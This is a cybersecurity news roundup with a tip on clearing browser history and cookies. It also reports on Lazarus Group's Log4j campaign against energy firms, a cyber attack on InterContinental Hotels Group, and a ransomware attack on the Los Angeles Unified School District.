Follow ISA Cybersecurity on LinkedIn for the latest cybersecurity news
Weekly CyberTip: Clear your browser history and cookies
Whether you work on a desktop computer or a mobile device, almost all of your activities on the Internet are recorded by your browser. A history of websites, cached copies of images, and even information you enter on online forms may be stored for future use. Cookies (small status or tracking files created during your visits to a website) may be left behind after you’ve closed your session. These files can eventually degrade the performance of your browser – and may provide a trove of information if someone else gains access to your machine. Regularly clearing your browsing history and cookies is a good way to mitigate these risks. In most web browsers on desktop machines, pressing Ctrl+Shift+Del will open a tab on which you can clear your browsing data. Mobile devices are easy to clean up too: for Apple iOS, select Settings > Safari to clear these files; for Android, select Menu > More > Settings or Menu > Settings > Privacy & Security.
Cisco researchers show Log4j vulnerability still looms large
In a September 8 blog post, researchers from Cisco provide new details on how the threat actor gang Lazarus Group has been exploiting the Log4j vulnerability to launch attacks against energy providers around the world, including those based in Canada, the United States, and Japan. While information about the attacks by Lazarus Group was published earlier this summer (e.g., by the JPCERT/CC, Japan’s national CSIRT), the new report provides more technical details and deeper insights into the threats.
The group has been targeting exposed VMware Horizon servers using the Log4j vulnerability as an initial attack vector. One inside the victim’s network, the gang has been using malware like VSingle and YamaBot to expand their presence.
“In this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives,” according to the report. “This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.”
InterContinental Hotel Group operations “significantly disrupted” by cyber attack
On September 6, global hospitality company InterContinental Hotels Group PLC (IHG) issued a statement confirming “unauthorized activity” on its technology systems. In a disclosure to the London Stock Exchange the same day, the company advised that its booking channels and other applications had been “significantly disrupted,” though its hotels are still able to operate and to take reservations directly.
“IHG has implemented its response plans, is notifying relevant regulatory authorities and is working closely with its technology suppliers. External specialists have also been engaged to investigate the incident,” according to its disclosure notice.
According to an analysis by cyber forensics firm Hudson Rock, over 4,000 ICH users and 15 of its 325,000 employees may have been compromised in the attack. IHG has not acknowledged that report, and has made no further official statements since its LSE filing. Normal booking and website services appear to have resumed by September 8, though internal services may still be in recovery mode.
ICH operates over 6,000 hotels, including 17 well-known brands such as InterContinental, Regent, Holiday Inn, and Crowne Plaza across 100 countries.
Los Angeles Unified School District hit by cyber attack
In a September 6 news conference, Alberto Carvalho, the superintendent of the Los Angeles Unified School District (LAUSD), confirmed that the district had been hit by a cyber attack.
The attack was discovered around 10:30 p.m. (PT) on September 3 when IT staff first detected “unusual activity” over the Labour Day weekend. Carvalho said that malware had infected key network systems, necessitating password resets for all staff and students. The damage might have been even more severe, but LAUSD IT staff stopped the malware from propagating through the entire network.
“We basically shut down every one of our systems,” Carvalho said, noting that each one had been checked and all but one — the facilities system — had been restarted by September 5. That day, in a posting on their website, the district described a “significant disruption to our system’s infrastructure,” but was still able to proceed with school opening on September 6 as scheduled. Visitors to the website as late as September 12 still receive alerts advising: “We’re experiencing a service outage with multiple applications. Our team is currently working to restore the service. We apologize for any inconvenience.”
The attackers are suspected to be affiliated with the Vice Society, who claim to have stolen 500 GB of data from the district’s networks. On September 6, federal authorities warned of potential ransomware attacks by the Vice Society, which has a reputation for targeting the education sector, particularly in the United States and the United Kingdom. No details have been disclosed regarding ransom payments, or even whether the district will confirm that the Vice Society was involved.
LAUSD is the second largest school district in the U.S., with an enrolment of over 640,000 students from K to 12. The district catchments include Los Angeles proper, areas from 31 smaller municipalities, and some unincorporated sections of Los Angeles County.